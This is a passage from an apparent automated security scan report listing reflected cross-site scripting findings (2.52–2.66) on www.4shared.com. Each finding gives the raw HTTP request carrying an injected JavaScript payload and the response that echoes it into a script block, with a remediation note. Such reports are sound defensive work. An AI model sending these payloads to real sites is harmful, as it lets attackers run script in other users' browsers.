This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/tomcat.gif72d4f"-alert(1)-"5ac35c7e5b0 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images/tomcat.gif72d4f&quot;-alert(1)-&quot;5ac35c7e5b0
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:37 GMT
Content-Length: 38801


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images/tomcat.gif72d4f"-alert(1)-"5ac35c7e5b0";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.52. http://www.4shared.com/images/void.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/void.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1b9a1"-alert(1)-"4062e8ef85a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images1b9a1"-alert(1)-"4062e8ef85a/void.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images1b9a1&quot;-alert(1)-&quot;4062e8ef85a/void.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:32 GMT
Content-Length: 38616


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images1b9a1"-alert(1)-"4062e8ef85a/void.gif";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.53. http://www.4shared.com/images/void.gif [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/void.gif

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 567f5'-alert(1)-'059fe02c858 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images567f5'-alert(1)-'059fe02c858/void.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images567f5'-alert(1)-'059fe02c858/void.gif
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:34 GMT
Content-Length: 38788


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
f(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/images567f5'-alert(1)-'059fe02c858/void.gif',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

func
...[SNIP]...

2.54. http://www.4shared.com/images/void.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/void.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1f98"-alert(1)-"e9252717822 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/void.giff1f98"-alert(1)-"e9252717822 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images/void.giff1f98&quot;-alert(1)-&quot;e9252717822
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:44 GMT
Content-Length: 38789


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/images/void.giff1f98"-alert(1)-"e9252717822";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.55. http://www.4shared.com/images/void.gif [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /images/void.gif

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b80f'-alert(1)-'86a0d9e7305 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/void.gif6b80f'-alert(1)-'86a0d9e7305 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /images/void.gif6b80f'-alert(1)-'86a0d9e7305
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:09:46 GMT
Content-Length: 38617


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/images/void.gif6b80f'-alert(1)-'86a0d9e7305',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.56. http://www.4shared.com/js/'%20+%20img%20+%20' [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/'%20+%20img%20+%20'

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6248'-alert(1)-'b993a65eb35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jsd6248'-alert(1)-'b993a65eb35/'%20+%20img%20+%20' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /jsd6248'-alert(1)-'b993a65eb35/'%20+%20img%20+%20'
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:10 GMT
Content-Length: 38647


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/jsd6248'-alert(1)-'b993a65eb35/'%20+%20img%20+%20'',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}

...[SNIP]...

2.57. http://www.4shared.com/js/'%20+%20img%20+%20' [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/'%20+%20img%20+%20'

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e09e2"-alert(1)-"8363f936c08 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /jse09e2"-alert(1)-"8363f936c08/'%20+%20img%20+%20' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /jse09e2&quot;-alert(1)-&quot;8363f936c08/'%20+%20img%20+%20'
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:08 GMT
Content-Length: 38823


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/jse09e2"-alert(1)-"8363f936c08/'%20+%20img%20+%20'";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

2.58. http://www.4shared.com/js/'%20+%20img%20+%20' [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/'%20+%20img%20+%20'

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53ef4'-alert(1)-'a73e7efb6a5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/'%20+%20img%20+%20'53ef4'-alert(1)-'a73e7efb6a5 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/'%20+%20img%20+%20'53ef4'-alert(1)-'a73e7efb6a5
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:21 GMT
Content-Length: 38652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
x == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/'%20+%20img%20+%20'53ef4'-alert(1)-'a73e7efb6a5',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.59. http://www.4shared.com/js/'%20+%20img%20+%20' [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/'%20+%20img%20+%20'

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e23b7"-alert(1)-"ddd5fafebed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/'%20+%20img%20+%20'e23b7"-alert(1)-"ddd5fafebed HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/'%20+%20img%20+%20'e23b7&quot;-alert(1)-&quot;ddd5fafebed
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:19 GMT
Content-Length: 38827


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/'%20+%20img%20+%20'e23b7"-alert(1)-"ddd5fafebed";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.60. http://www.4shared.com/js/'%20+%20val%20+%20' [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/'%20+%20val%20+%20'

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 32262"-alert(1)-"5ea80ba4494 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js32262"-alert(1)-"5ea80ba4494/'%20+%20val%20+%20' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js32262&quot;-alert(1)-&quot;5ea80ba4494/'%20+%20val%20+%20'
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:07 GMT
Content-Length: 38647


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js32262"-alert(1)-"5ea80ba4494/'%20+%20val%20+%20'";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedbac
...[SNIP]...

2.61. http://www.4shared.com/js/'%20+%20val%20+%20' [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/'%20+%20val%20+%20'

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ae46'-alert(1)-'e9717228dec was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js2ae46'-alert(1)-'e9717228dec/'%20+%20val%20+%20' HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js2ae46'-alert(1)-'e9717228dec/'%20+%20val%20+%20'
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:09 GMT
Content-Length: 38824


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js2ae46'-alert(1)-'e9717228dec/'%20+%20val%20+%20'',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}

...[SNIP]...

2.62. http://www.4shared.com/js/'%20+%20val%20+%20' [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/'%20+%20val%20+%20'

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4048b'-alert(1)-'e8ba1bdb223 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/'%20+%20val%20+%20'4048b'-alert(1)-'e8ba1bdb223 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/'%20+%20val%20+%20'4048b'-alert(1)-'e8ba1bdb223
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:21 GMT
Content-Length: 38645


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
x == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js/'%20+%20val%20+%20'4048b'-alert(1)-'e8ba1bdb223',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

function ensu
...[SNIP]...

2.63. http://www.4shared.com/js/'%20+%20val%20+%20' [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/'%20+%20val%20+%20'

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a806a"-alert(1)-"8921d112299 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/'%20+%20val%20+%20'a806a"-alert(1)-"8921d112299 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.4shared.com

Response

HTTP/1.1 404 /js/'%20+%20val%20+%20'a806a&quot;-alert(1)-&quot;8921d112299
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:11:19 GMT
Content-Length: 38649


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:null-->
<title>4share
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js/'%20+%20val%20+%20'a806a"-alert(1)-"8921d112299";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {
var wind
...[SNIP]...

2.64. http://www.4shared.com/js/Jsonp.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/Jsonp.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8619f'-alert(1)-'d5c040e7677 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js8619f'-alert(1)-'d5c040e7677/Jsonp.js?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""

Response

HTTP/1.1 404 /js8619f'-alert(1)-'d5c040e7677/Jsonp.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:59:41 GMT
Content-Length: 38790


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
if(typeof loginBox == 'undefined'){
$('#loginBoxDiv').load('/loginBox.jsp',
{
login : '',
password : '',
fpRedirParam : 'http://www.4shared.com/js8619f'-alert(1)-'d5c040e7677/Jsonp.js',
remember : true


},
function(){
showLoginBox();
}
);
}else{
showLoginBox();
}
}

func
...[SNIP]...

2.65. http://www.4shared.com/js/Jsonp.js [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/Jsonp.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e1ee"-alert(1)-"fd3838b98de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js6e1ee"-alert(1)-"fd3838b98de/Jsonp.js?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""

Response

HTTP/1.1 404 /js6e1ee&quot;-alert(1)-&quot;fd3838b98de/Jsonp.js
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 13:59:38 GMT
Content-Length: 38796


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>
<head>
<!--// ref:http://www.4shared.com/
...[SNIP]...
<script type="text/javascript">
function reportAbuse() {
var windowname="abuse";
var url="/abuse.jsp?aLink=http://www.4shared.com/js6e1ee"-alert(1)-"fd3838b98de/Jsonp.js";
OpenWindow = window.open(url,windowname,'toolbar=no,scrollbars=yes,resizable=yes,width=550,height=650,left=50,top=50');
OpenWindow.focus();
}
function feedback() {

...[SNIP]...

2.66. http://www.4shared.com/js/Jsonp.js [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.4shared.com
Path:   /js/Jsonp.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6306"-alert(1)-"2b949987eec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /js/Jsonp.jsd6306"-alert(1)-"2b949987eec?ver=5756 HTTP/1.1
Host: www.4shared.com
Proxy-Connection: keep-alive
Referer: http://www.4shared.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: day1host=h; hostid=-1098292958; df=""; sd=""; afu=""; afp=""; adu=""; adp=""; asl=""; chf=""; dirPwdVerified=""

Response

HTTP/1.1 404 /js/Jsonp.jsd6306&quot;-alert(1)-&quot;2b949987eec
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Fri, 29 Jul 2011 14:00:04 GMT
